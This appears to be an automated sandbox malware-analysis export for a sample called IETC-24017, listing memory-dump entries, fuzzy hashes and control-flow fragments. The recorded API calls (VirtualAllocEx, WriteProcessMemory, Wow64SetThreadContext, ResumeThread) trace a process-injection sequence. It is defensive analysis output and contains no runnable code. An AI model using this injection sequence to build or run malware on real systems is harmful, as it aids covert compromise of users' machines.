                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ECC02E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: 379eba00135998b297217776c4e19b4af7ebdf231380595b4225c3329e90a90b
                                                                                                                                                  • Instruction ID: e28426b579a6d92bd0e0000c6a0091cd90ffc8e2eb21eb20f3fdd891c6adb607
                                                                                                                                                  • Opcode Fuzzy Hash: 379eba00135998b297217776c4e19b4af7ebdf231380595b4225c3329e90a90b
                                                                                                                                                  • Instruction Fuzzy Hash: EFA16D71D003599FEB50CFA8CD41BEDBBB2BF48314F1485A9E848A7280DB749986CF91

                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ECC02E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                                  • Opcode ID: e7e78a8321a6164fe55b63f8ef895a9ca94c8d44fae5d857b6ae56ddcbaa4acf
                                                                                                                                                  • Instruction ID: 25abcf92978724a14d96ff5d0d1b354f460c9017a2173e5fefdc73bb6ea9885b
                                                                                                                                                  • Opcode Fuzzy Hash: e7e78a8321a6164fe55b63f8ef895a9ca94c8d44fae5d857b6ae56ddcbaa4acf
                                                                                                                                                  • Instruction Fuzzy Hash: B7915D71D003598FEB60CFA8C941BEDBBB2BF44314F1485A9E849A7280DB759986CF91

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025CAFDE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  • Opcode ID: 935a8a9ea6d8950774fa028300ba35defd38a297cb1019308b17e4ca3046bb5a
                                                                                                                                                  • Instruction ID: 5041e7e533fab9d63bae084f4d9dfe80a4915a8aaec8e8c01e1bda5dd37ce3cb
                                                                                                                                                  • Opcode Fuzzy Hash: 935a8a9ea6d8950774fa028300ba35defd38a297cb1019308b17e4ca3046bb5a
                                                                                                                                                  • Instruction Fuzzy Hash: BD7137B0A00B098FDB24DF69D55579ABBF1FF88304F10892DD48AD7A50EB34E945CB94

                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D11A02
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: f21d1e1ab9d245b26c6e61ce1c03ba7b0df776887bf6b15d60bda83a5ad1336d
                                                                                                                                                  • Instruction ID: 411b16888afa35b1ba6901ad9acf50fbf4b8ec81635505ef797e5ae4718a3560
                                                                                                                                                  • Opcode Fuzzy Hash: f21d1e1ab9d245b26c6e61ce1c03ba7b0df776887bf6b15d60bda83a5ad1336d
                                                                                                                                                  • Instruction Fuzzy Hash: B551C0B1D00349EFDB14CFA9D880ADDBFB1BF48310F24826AE919AB250D775A985CF51

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1161 4d118f0-4d11956 1162 4d11961-4d11968 1161->1162 1163 4d11958-4d1195e 1161->1163 1164 4d11973-4d11a12 CreateWindowExW 1162->1164 1165 4d1196a-4d11970 1162->1165 1163->1162 1167 4d11a14-4d11a1a 1164->1167 1168 4d11a1b-4d11a53 1164->1168 1165->1164 1167->1168 1172 4d11a60 1168->1172 1173 4d11a55-4d11a58 1168->1173 1174 4d11a61 1172->1174 1173->1172 1174->1174
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D11A02
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                  • Opcode ID: 0a3c2e33262efe22b45be7aa07ce49e3880450f717e91304d9a5425e958b8b2c
                                                                                                                                                  • Instruction ID: ca291c916124150caa3ea117dff97cb40b7da6277241d37de525d394169daff5
                                                                                                                                                  • Opcode Fuzzy Hash: 0a3c2e33262efe22b45be7aa07ce49e3880450f717e91304d9a5425e958b8b2c
                                                                                                                                                  • Instruction Fuzzy Hash: 5841C3B1D00349AFDF14CF99D884ADEBFB5BF48310F24822AE818AB250D775A945CF90

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1175 25c44b4-25c59d9 CreateActCtxA 1178 25c59db-25c59e1 1175->1178 1179 25c59e2-25c5a3c 1175->1179 1178->1179 1186 25c5a3e-25c5a41 1179->1186 1187 25c5a4b-25c5a4f 1179->1187 1186->1187 1188 25c5a60 1187->1188 1189 25c5a51-25c5a5d 1187->1189 1191 25c5a61 1188->1191 1189->1188 1191->1191
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 025C59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: cfbe9aca82f4b46956d1872814cbc8641825a08d017296f1b0c6be9c9ed12b34
                                                                                                                                                  • Instruction ID: a264591873eaa1ebdc20791143d4b6dd8a7f6152afd0ec691d4ed3274b684dd4
                                                                                                                                                  • Opcode Fuzzy Hash: cfbe9aca82f4b46956d1872814cbc8641825a08d017296f1b0c6be9c9ed12b34
                                                                                                                                                  • Instruction Fuzzy Hash: A841C270C00619CFDB24CFAAC8447DDBBF5BF48314F6084AAD408AB255EB75A946CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1192 25c590c-25c59d9 CreateActCtxA 1194 25c59db-25c59e1 1192->1194 1195 25c59e2-25c5a3c 1192->1195 1194->1195 1202 25c5a3e-25c5a41 1195->1202 1203 25c5a4b-25c5a4f 1195->1203 1202->1203 1204 25c5a60 1203->1204 1205 25c5a51-25c5a5d 1203->1205 1207 25c5a61 1204->1207 1205->1204 1207->1207
                                                                                                                                                  APIs
                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 025C59C9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Create
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                  • Opcode ID: b0749de792a672738d19cd69bda0724b6f8ebaf83f10d1eb783ed5089baaa9c3
                                                                                                                                                  • Instruction ID: 430d0223166a8c88ff27ca13cc813bfe2a596ea785a1bf049cda422d7490c0d1
                                                                                                                                                  • Opcode Fuzzy Hash: b0749de792a672738d19cd69bda0724b6f8ebaf83f10d1eb783ed5089baaa9c3
                                                                                                                                                  • Instruction Fuzzy Hash: 5041D3B0C00619CFDB24CFAAC8847DDBBF5BF48314F60849AD408AB255EB756946CF50

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 1208 4d14050-4d1408c 1209 4d14092-4d14097 1208->1209 1210 4d1413c-4d1415c 1208->1210 1211 4d14099-4d140d0 1209->1211 1212 4d140ea-4d14122 CallWindowProcW 1209->1212 1217 4d1415f-4d1416c 1210->1217 1218 4d140d2-4d140d8 1211->1218 1219 4d140d9-4d140e8 1211->1219 1213 4d14124-4d1412a 1212->1213 1214 4d1412b-4d1413a 1212->1214 1213->1214 1214->1217 1218->1219 1219->1217
                                                                                                                                                  APIs
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 04D14111
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                                  • Opcode ID: ab4fb7bbad26030b9b030da2b5b7dfc61bc276a9c893e063e75997e51c9309ed
                                                                                                                                                  • Instruction ID: 312438884f303e5d1a2d8e713d395421be6679f8fbdc8c747976d565da6e35a8
                                                                                                                                                  • Opcode Fuzzy Hash: ab4fb7bbad26030b9b030da2b5b7dfc61bc276a9c893e063e75997e51c9309ed
                                                                                                                                                  • Instruction Fuzzy Hash: 5A4108B9A00205DFDB14CF9AC848AAABBF5FB88314F248459D519AB361D375E841CFA1
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ECBC00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 2fa3eef4d05980f9bf28d5ed425f69bf4007a113a137dc0adff7af7151e3b8d0
                                                                                                                                                  • Instruction ID: fb8b75619ebfc734c9d33b315d51c6363defdadd66070704e1704b324b3b9fa1
                                                                                                                                                  • Opcode Fuzzy Hash: 2fa3eef4d05980f9bf28d5ed425f69bf4007a113a137dc0adff7af7151e3b8d0
                                                                                                                                                  • Instruction Fuzzy Hash: E82128B5D003499FCB50CFA9C982BDEBBF5FF48320F10842AE919A7644C7789945CBA5
                                                                                                                                                  APIs
                                                                                                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ECBC00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3559483778-0
                                                                                                                                                  • Opcode ID: 7a002f910e70efaf78cc0ec2f7e0f81f64175d91822caf364905f56225561ed6
                                                                                                                                                  • Instruction ID: 20a2449ee4b932e4f78cfd7abb2fbc18e12bf5cce37df8c401db1867e292aec1
                                                                                                                                                  • Opcode Fuzzy Hash: 7a002f910e70efaf78cc0ec2f7e0f81f64175d91822caf364905f56225561ed6
                                                                                                                                                  • Instruction Fuzzy Hash: 2E212A71D003499FCB10CFA9C981BDEBBF5FF48320F10842AE918A7240C7789945CB64
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ECBCE0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  • Opcode ID: e6c620654e2b2365f75eebbbc089b79a349085297314a113dc741129f719d9e1
                                                                                                                                                  • Instruction ID: 030cf9801649274fa9e6d930b6229ab0110f530ba97ec2050b2c01b1aa8d9131
                                                                                                                                                  • Opcode Fuzzy Hash: e6c620654e2b2365f75eebbbc089b79a349085297314a113dc741129f719d9e1
                                                                                                                                                  • Instruction Fuzzy Hash: 21211975D003599FCB10CFAAC981BEEBBF5FF48320F10842AE918A7640C7399541CBA5
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ECBA56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  • Opcode ID: 6846b3342fd120eb64b2ba5f5bea6dc4f64031ea1457d73957f7cbcebd67d79a
                                                                                                                                                  • Instruction ID: 9e9d04ee9e20e5fbfee929210e7d1145c3595b5671bab854223687fbc5d50c6c
                                                                                                                                                  • Opcode Fuzzy Hash: 6846b3342fd120eb64b2ba5f5bea6dc4f64031ea1457d73957f7cbcebd67d79a
                                                                                                                                                  • Instruction Fuzzy Hash: 22215971D003089FCB10CFAAC481BEEBBF4AF88324F10842AD459A7240C7789A45CFA1
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025CD626,?,?,?,?,?), ref: 025CD6E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  • Opcode ID: 2206225bad521c28a2a7383d4498e0079a8cbccccc3cd317ff2b4ace302a8506
                                                                                                                                                  • Instruction ID: 6846190c0e948d6c8b53d514fed3b7841db3e8d99f5c2540adf07c66b7e7138c
                                                                                                                                                  • Opcode Fuzzy Hash: 2206225bad521c28a2a7383d4498e0079a8cbccccc3cd317ff2b4ace302a8506
                                                                                                                                                  • Instruction Fuzzy Hash: CD21E6B59012489FDB10CFAAD584ADEFFF4FB48310F14846AE918A3350D379A944CFA5
                                                                                                                                                  APIs
                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025CD626,?,?,?,?,?), ref: 025CD6E7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                  APIs
                                                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ECBCE0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryProcessRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1726664587-0
                                                                                                                                                  APIs
                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ECBA56
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ECBB1E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ECBB1E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ECE62D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025CAFDE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683604408.00000000025C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025C0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_25c0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 06ECE62D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1694168482.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6ec0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessagePost
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 410705778-0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6eb12c5aa5fb377bce2593f39899184415acf97947c613523676a35c3be4bee4
                                                                                                                                                  • Instruction ID: 8ce9ea45ffc96932f6154be017afe6243a4c31c5832bb54f9efc6f59fa75a31b
                                                                                                                                                  • Opcode Fuzzy Hash: 6eb12c5aa5fb377bce2593f39899184415acf97947c613523676a35c3be4bee4
                                                                                                                                                  • Instruction Fuzzy Hash: BC2123B1604200EFDB05DF24D9C0F26BBA5FB88314F24CABDE8094B296C336D846CA61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 24d9b099046bb2e8ffb60310d9ddbdf14a461604673d78bb92e400043155b2ec
                                                                                                                                                  • Instruction ID: 74f7582b22e3ed2fc505995e2e438be532817fa9c25a7dfd0ee4a2a202dd83db
                                                                                                                                                  • Opcode Fuzzy Hash: 24d9b099046bb2e8ffb60310d9ddbdf14a461604673d78bb92e400043155b2ec
                                                                                                                                                  • Instruction Fuzzy Hash: E32180755093808FCB12CF24D994B15BF71EB46314F29C5EED8498F6A7C33A980ACB62
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 83191eccc29e628a34a03ffed49876192710ca394c006f0920ba727d99875529
                                                                                                                                                  • Instruction ID: 69158693ae282dca08c19f2e36e7c1e7dd3f5c9395f5163b1e50ea490f03926d
                                                                                                                                                  • Opcode Fuzzy Hash: 83191eccc29e628a34a03ffed49876192710ca394c006f0920ba727d99875529
                                                                                                                                                  • Instruction Fuzzy Hash: 3F11E276504280DFDB16CF14D9C4B56BF72FB94324F24C6A9D8090B657C33AE85ACBA2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683187763.0000000000ACD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ACD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_acd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 125823f2ff70af28d65354305c8016ae8e350b1263d5c8a378dc159e47d8c3d6
                                                                                                                                                  • Instruction ID: d3574edfa893e8e33ef38416e282ec75da80e6c7780d1c89471c34eeaa9ec947
                                                                                                                                                  • Opcode Fuzzy Hash: 125823f2ff70af28d65354305c8016ae8e350b1263d5c8a378dc159e47d8c3d6
                                                                                                                                                  • Instruction Fuzzy Hash: 87119D76504280DFDB16CF14D9C4B55FBB1FB84314F24C6AED8494B696C33AD84ACB61
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8c9edc095eef8625fada83fdc20d548866e4d92ddfcc02433ffe2e20d994e388
                                                                                                                                                  • Instruction ID: 077093fe8b2360db82221250ded76771c524df59213be3c5ad3f57b3b0f48313
                                                                                                                                                  • Opcode Fuzzy Hash: 8c9edc095eef8625fada83fdc20d548866e4d92ddfcc02433ffe2e20d994e388
                                                                                                                                                  • Instruction Fuzzy Hash: F401DB711043409EE7204B2ACC847E6FFECEF41324F18845AED094A287D779DC84C6B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1683151861.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_abd000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0ba246de45d4a42a74581e96dba8b6fb9241e2f22f016008778a8e16b79a4fd7
                                                                                                                                                  • Instruction ID: 2fc094f9ed91f8dfd41cb542634827601ad1d2fef07319dfbd3703ea7a2cecb0
                                                                                                                                                  • Opcode Fuzzy Hash: 0ba246de45d4a42a74581e96dba8b6fb9241e2f22f016008778a8e16b79a4fd7
                                                                                                                                                  • Instruction Fuzzy Hash: 66F068714043409EE7208B16DC847A6FFECEF51734F18C45AED084A287D2759C44CA71
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1689843291.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_4d10000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
